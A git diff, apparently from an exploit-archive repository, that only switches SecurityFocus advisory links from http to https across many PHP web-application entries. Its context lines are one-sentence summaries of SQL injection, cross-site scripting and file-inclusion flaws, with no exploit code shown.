a/exploits/php/webapps/26541.txt b/exploits/php/webapps/26541.txt index 766987e06..0d08d5eeb 100644 --- a/exploits/php/webapps/26541.txt +++ b/exploits/php/webapps/26541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15508/info +source: https://www.securityfocus.com/bid/15508/info SimplePoll is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26543.txt b/exploits/php/webapps/26543.txt index 083043289..e04ba46fe 100644 --- a/exploits/php/webapps/26543.txt +++ b/exploits/php/webapps/26543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15513/info +source: https://www.securityfocus.com/bid/15513/info APBoard is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in SQL queries. diff --git a/exploits/php/webapps/26544.txt b/exploits/php/webapps/26544.txt index b845c830d..45da648d1 100644 --- a/exploits/php/webapps/26544.txt +++ b/exploits/php/webapps/26544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15517/info +source: https://www.securityfocus.com/bid/15517/info PHP Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26545.txt b/exploits/php/webapps/26545.txt index 4a456a026..6a355b6ef 100644 --- a/exploits/php/webapps/26545.txt +++ b/exploits/php/webapps/26545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15519/info +source: https://www.securityfocus.com/bid/15519/info Nuke ET is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26546.txt b/exploits/php/webapps/26546.txt index a8f86fff4..abb6ce146 100644 --- a/exploits/php/webapps/26546.txt +++ b/exploits/php/webapps/26546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15524/info +source: https://www.securityfocus.com/bid/15524/info PHP-Post is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26547.txt b/exploits/php/webapps/26547.txt index 356ef5d04..d7d2df546 100644 --- a/exploits/php/webapps/26547.txt +++ b/exploits/php/webapps/26547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15524/info +source: https://www.securityfocus.com/bid/15524/info PHP-Post is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26549.txt b/exploits/php/webapps/26549.txt index 617593f08..ec6d9a6b1 100644 --- a/exploits/php/webapps/26549.txt +++ b/exploits/php/webapps/26549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15530/info +source: https://www.securityfocus.com/bid/15530/info Torrential is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26559.txt b/exploits/php/webapps/26559.txt index ffbbad59e..2b0655219 100644 --- a/exploits/php/webapps/26559.txt +++ b/exploits/php/webapps/26559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15538/info +source: https://www.securityfocus.com/bid/15538/info Virtual Hosting Control System is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/26560.txt b/exploits/php/webapps/26560.txt index 5096716cc..4b11dea82 100644 --- a/exploits/php/webapps/26560.txt +++ b/exploits/php/webapps/26560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15539/info +source: https://www.securityfocus.com/bid/15539/info PmWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26561.txt b/exploits/php/webapps/26561.txt index a897228e0..f14b10add 100644 --- a/exploits/php/webapps/26561.txt +++ b/exploits/php/webapps/26561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15544/info +source: https://www.securityfocus.com/bid/15544/info 1-2-3 Music Store is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26562.txt b/exploits/php/webapps/26562.txt index 760aba8de..29200c2c8 100644 --- a/exploits/php/webapps/26562.txt +++ b/exploits/php/webapps/26562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26563.txt b/exploits/php/webapps/26563.txt index ad2598e97..092d99454 100644 --- a/exploits/php/webapps/26563.txt +++ b/exploits/php/webapps/26563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26564.txt b/exploits/php/webapps/26564.txt index 00159fdf6..bee691184 100644 --- a/exploits/php/webapps/26564.txt +++ b/exploits/php/webapps/26564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26565.txt b/exploits/php/webapps/26565.txt index fd500d052..061600c29 100644 --- a/exploits/php/webapps/26565.txt +++ b/exploits/php/webapps/26565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15548/info +source: https://www.securityfocus.com/bid/15548/info Tunez is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26566.txt b/exploits/php/webapps/26566.txt index f1a48ffa5..d4dd54570 100644 --- a/exploits/php/webapps/26566.txt +++ b/exploits/php/webapps/26566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15548/info +source: https://www.securityfocus.com/bid/15548/info Tunez is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26567.txt b/exploits/php/webapps/26567.txt index 0047f4251..974ff9f6c 100644 --- a/exploits/php/webapps/26567.txt +++ b/exploits/php/webapps/26567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15549/info +source: https://www.securityfocus.com/bid/15549/info WSN Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26568.txt b/exploits/php/webapps/26568.txt index fa1df6490..9375ce6b9 100644 --- a/exploits/php/webapps/26568.txt +++ b/exploits/php/webapps/26568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15550/info +source: https://www.securityfocus.com/bid/15550/info OmnistarLive is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26569.txt b/exploits/php/webapps/26569.txt index 4b2f2a055..32ca39415 100644 --- a/exploits/php/webapps/26569.txt +++ b/exploits/php/webapps/26569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15551/info +source: https://www.securityfocus.com/bid/15551/info PHP Labs Survey Wizard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26570.txt b/exploits/php/webapps/26570.txt index 45fe1852f..479e64eb4 100644 --- a/exploits/php/webapps/26570.txt +++ b/exploits/php/webapps/26570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15552/info +source: https://www.securityfocus.com/bid/15552/info CommodityRentals is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26571.txt b/exploits/php/webapps/26571.txt index 15b23ad37..c6738ae85 100644 --- a/exploits/php/webapps/26571.txt +++ b/exploits/php/webapps/26571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15553/info +source: https://www.securityfocus.com/bid/15553/info Ezyhelpdesk is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26572.txt b/exploits/php/webapps/26572.txt index 0617fcc42..f9cbd271f 100644 --- a/exploits/php/webapps/26572.txt +++ b/exploits/php/webapps/26572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26573.txt b/exploits/php/webapps/26573.txt index aab42065d..3cc7b90d0 100644 --- a/exploits/php/webapps/26573.txt +++ b/exploits/php/webapps/26573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26574.txt b/exploits/php/webapps/26574.txt index 4f8a6a52d..a06326bc9 100644 --- a/exploits/php/webapps/26574.txt +++ b/exploits/php/webapps/26574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26576.txt b/exploits/php/webapps/26576.txt index 70e478ff6..0fca3a9a0 100644 --- a/exploits/php/webapps/26576.txt +++ b/exploits/php/webapps/26576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15559/info +source: https://www.securityfocus.com/bid/15559/info freeForum is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26580.txt b/exploits/php/webapps/26580.txt index 12c7ac847..2901766d6 100644 --- a/exploits/php/webapps/26580.txt +++ b/exploits/php/webapps/26580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26581.txt b/exploits/php/webapps/26581.txt index 15cba456b..030610b03 100644 --- a/exploits/php/webapps/26581.txt +++ b/exploits/php/webapps/26581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26582.txt b/exploits/php/webapps/26582.txt index ad67b703e..ac7b5c86d 100644 --- a/exploits/php/webapps/26582.txt +++ b/exploits/php/webapps/26582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26583.txt b/exploits/php/webapps/26583.txt index 89f47e7ad..ff2e2218f 100644 --- a/exploits/php/webapps/26583.txt +++ b/exploits/php/webapps/26583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26584.txt b/exploits/php/webapps/26584.txt index ba740db8b..4c1b7607b 100644 --- a/exploits/php/webapps/26584.txt +++ b/exploits/php/webapps/26584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26585.txt b/exploits/php/webapps/26585.txt index a3a613b54..24952f5b8 100644 --- a/exploits/php/webapps/26585.txt +++ b/exploits/php/webapps/26585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26586.txt b/exploits/php/webapps/26586.txt index 70fe6c536..15fbc792c 100644 --- a/exploits/php/webapps/26586.txt +++ b/exploits/php/webapps/26586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26587.txt b/exploits/php/webapps/26587.txt index bebaa6752..9660da575 100644 --- a/exploits/php/webapps/26587.txt +++ b/exploits/php/webapps/26587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15563/info +source: https://www.securityfocus.com/bid/15563/info Comdev Vote Caster is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26588.txt b/exploits/php/webapps/26588.txt index c2e9f2bb8..d323451ae 100644 --- a/exploits/php/webapps/26588.txt +++ b/exploits/php/webapps/26588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15565/info +source: https://www.securityfocus.com/bid/15565/info Orca Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26589.txt b/exploits/php/webapps/26589.txt index 8e3023e8a..869512e37 100644 --- a/exploits/php/webapps/26589.txt +++ b/exploits/php/webapps/26589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15566/info +source: https://www.securityfocus.com/bid/15566/info OvBB is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26590.txt b/exploits/php/webapps/26590.txt index f5c9547bd..13d8ac63d 100644 --- a/exploits/php/webapps/26590.txt +++ b/exploits/php/webapps/26590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15566/info +source: https://www.securityfocus.com/bid/15566/info OvBB is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26591.txt b/exploits/php/webapps/26591.txt index c8b2d4926..da55a42e5 100644 --- a/exploits/php/webapps/26591.txt +++ b/exploits/php/webapps/26591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26592.txt b/exploits/php/webapps/26592.txt index 36760b50b..ae2cbf085 100644 --- a/exploits/php/webapps/26592.txt +++ b/exploits/php/webapps/26592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26593.txt b/exploits/php/webapps/26593.txt index b0c175885..c7251523d 100644 --- a/exploits/php/webapps/26593.txt +++ b/exploits/php/webapps/26593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26594.txt b/exploits/php/webapps/26594.txt index 8be3964bd..893f3306a 100644 --- a/exploits/php/webapps/26594.txt +++ b/exploits/php/webapps/26594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26595.txt b/exploits/php/webapps/26595.txt index adaa27004..a7053761c 100644 --- a/exploits/php/webapps/26595.txt +++ b/exploits/php/webapps/26595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15570/info +source: https://www.securityfocus.com/bid/15570/info Support Center is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26596.txt b/exploits/php/webapps/26596.txt index 4c03a25e4..1658b1bda 100644 --- a/exploits/php/webapps/26596.txt +++ b/exploits/php/webapps/26596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15572/info +source: https://www.securityfocus.com/bid/15572/info AgileBill is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly santize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26597.txt b/exploits/php/webapps/26597.txt index 988881033..1d82ef321 100644 --- a/exploits/php/webapps/26597.txt +++ b/exploits/php/webapps/26597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15573/info +source: https://www.securityfocus.com/bid/15573/info PBLang is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26598.txt b/exploits/php/webapps/26598.txt index 19fdfb068..ff24e7237 100644 --- a/exploits/php/webapps/26598.txt +++ b/exploits/php/webapps/26598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15574/info +source: https://www.securityfocus.com/bid/15574/info Athena PHP Website Administration is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26599.txt b/exploits/php/webapps/26599.txt index 9c40c10a6..729f78ece 100644 --- a/exploits/php/webapps/26599.txt +++ b/exploits/php/webapps/26599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15575/info +source: https://www.securityfocus.com/bid/15575/info phpGreetz is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26600.txt b/exploits/php/webapps/26600.txt index b0da9c811..1c00b543b 100644 --- a/exploits/php/webapps/26600.txt +++ b/exploits/php/webapps/26600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15576/info +source: https://www.securityfocus.com/bid/15576/info Q-News is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26602.txt b/exploits/php/webapps/26602.txt index d310f8fb1..abaa49c77 100644 --- a/exploits/php/webapps/26602.txt +++ b/exploits/php/webapps/26602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15578/info +source: https://www.securityfocus.com/bid/15578/info Enterprise Connector is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26603.txt b/exploits/php/webapps/26603.txt index bc2739d86..728586780 100644 --- a/exploits/php/webapps/26603.txt +++ b/exploits/php/webapps/26603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15578/info +source: https://www.securityfocus.com/bid/15578/info Enterprise Connector is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26604.txt b/exploits/php/webapps/26604.txt index 1bd645e10..389036aa3 100644 --- a/exploits/php/webapps/26604.txt +++ b/exploits/php/webapps/26604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15579/info +source: https://www.securityfocus.com/bid/15579/info Zainu is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26605.txt b/exploits/php/webapps/26605.txt index bff594ea8..426db37ca 100644 --- a/exploits/php/webapps/26605.txt +++ b/exploits/php/webapps/26605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15580/info +source: https://www.securityfocus.com/bid/15580/info Babe Logger is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26606.txt b/exploits/php/webapps/26606.txt index 078187939..27d9ca8ff 100644 --- a/exploits/php/webapps/26606.txt +++ b/exploits/php/webapps/26606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15580/info +source: https://www.securityfocus.com/bid/15580/info Babe Logger is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26607.txt b/exploits/php/webapps/26607.txt index 31bd27acc..ec4f9e068 100644 --- a/exploits/php/webapps/26607.txt +++ b/exploits/php/webapps/26607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15581/info +source: https://www.securityfocus.com/bid/15581/info Top Music Module for PHP-Nuke is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26608.txt b/exploits/php/webapps/26608.txt index d2f54edb3..73730e8dd 100644 --- a/exploits/php/webapps/26608.txt +++ b/exploits/php/webapps/26608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15582/info +source: https://www.securityfocus.com/bid/15582/info PHPWordPress is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26609.txt b/exploits/php/webapps/26609.txt index 8b1f29696..911c36092 100644 --- a/exploits/php/webapps/26609.txt +++ b/exploits/php/webapps/26609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26610.txt b/exploits/php/webapps/26610.txt index 1d99a4116..69667cb5f 100644 --- a/exploits/php/webapps/26610.txt +++ b/exploits/php/webapps/26610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26611.txt b/exploits/php/webapps/26611.txt index be45eff10..65443b4ba 100644 --- a/exploits/php/webapps/26611.txt +++ b/exploits/php/webapps/26611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26612.txt b/exploits/php/webapps/26612.txt index 415a2436f..b57de6996 100644 --- a/exploits/php/webapps/26612.txt +++ b/exploits/php/webapps/26612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15584/info +source: https://www.securityfocus.com/bid/15584/info Nelogic Nephp Publisher is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26613.txt b/exploits/php/webapps/26613.txt index e699bfc2a..016122e36 100644 --- a/exploits/php/webapps/26613.txt +++ b/exploits/php/webapps/26613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26614.txt b/exploits/php/webapps/26614.txt index 4b5c5f448..bffb197b0 100644 --- a/exploits/php/webapps/26614.txt +++ b/exploits/php/webapps/26614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26615.txt b/exploits/php/webapps/26615.txt index 45679970b..4e72aab0b 100644 --- a/exploits/php/webapps/26615.txt +++ b/exploits/php/webapps/26615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26616.txt b/exploits/php/webapps/26616.txt index a32a98f23..a66b6555a 100644 --- a/exploits/php/webapps/26616.txt +++ b/exploits/php/webapps/26616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26617.txt b/exploits/php/webapps/26617.txt index b976f0ec6..44cbf9c61 100644 --- a/exploits/php/webapps/26617.txt +++ b/exploits/php/webapps/26617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15586/info +source: https://www.securityfocus.com/bid/15586/info BerliOS SourceWell is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26618.txt b/exploits/php/webapps/26618.txt index 817d2a9a4..bff450d8f 100644 --- a/exploits/php/webapps/26618.txt +++ b/exploits/php/webapps/26618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15587/info +source: https://www.securityfocus.com/bid/15587/info AllWeb Search is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26619.txt b/exploits/php/webapps/26619.txt index 2daff8a12..b222b9ea5 100644 --- a/exploits/php/webapps/26619.txt +++ b/exploits/php/webapps/26619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15588/info +source: https://www.securityfocus.com/bid/15588/info K-Search is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26625.txt b/exploits/php/webapps/26625.txt index 03c0497fb..81ea7b448 100644 --- a/exploits/php/webapps/26625.txt +++ b/exploits/php/webapps/26625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15589/info +source: https://www.securityfocus.com/bid/15589/info edmoBBS is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26626.txt b/exploits/php/webapps/26626.txt index b932a2d41..baa38ad2d 100644 --- a/exploits/php/webapps/26626.txt +++ b/exploits/php/webapps/26626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15591/info +source: https://www.securityfocus.com/bid/15591/info UGroup is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26627.txt b/exploits/php/webapps/26627.txt index 0864f4e69..9f91d8835 100644 --- a/exploits/php/webapps/26627.txt +++ b/exploits/php/webapps/26627.txt @@ -1,4 +1,4 @@ -ource: http://www.securityfocus.com/bid/15591/info +ource: https://www.securityfocus.com/bid/15591/info UGroup is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26628.txt b/exploits/php/webapps/26628.txt index 01c6cfa62..773a4a148 100644 --- a/exploits/php/webapps/26628.txt +++ b/exploits/php/webapps/26628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15592/info +source: https://www.securityfocus.com/bid/15592/info ShockBoard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26629.txt b/exploits/php/webapps/26629.txt index be154d297..29bf73a92 100644 --- a/exploits/php/webapps/26629.txt +++ b/exploits/php/webapps/26629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15593/info +source: https://www.securityfocus.com/bid/15593/info Netzbrett is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26630.txt b/exploits/php/webapps/26630.txt index d808f886a..b08899cff 100644 --- a/exploits/php/webapps/26630.txt +++ b/exploits/php/webapps/26630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15595/info +source: https://www.securityfocus.com/bid/15595/info ADC2000 NG Pro is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26631.txt b/exploits/php/webapps/26631.txt index 48d07f703..46a0df435 100644 --- a/exploits/php/webapps/26631.txt +++ b/exploits/php/webapps/26631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15596/info +source: https://www.securityfocus.com/bid/15596/info Simple Document Management System (SDMS) is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26632.txt b/exploits/php/webapps/26632.txt index f53162647..685914987 100644 --- a/exploits/php/webapps/26632.txt +++ b/exploits/php/webapps/26632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15596/info +source: https://www.securityfocus.com/bid/15596/info Simple Document Management System (SDMS) is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26633.txt b/exploits/php/webapps/26633.txt index fe11b96ab..10bdbe37b 100644 --- a/exploits/php/webapps/26633.txt +++ b/exploits/php/webapps/26633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15598/info +source: https://www.securityfocus.com/bid/15598/info PDJK-support Suite is prone to multiple SQL injection vulnerabilities. These vulnerabilities could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. diff --git a/exploits/php/webapps/26634.txt 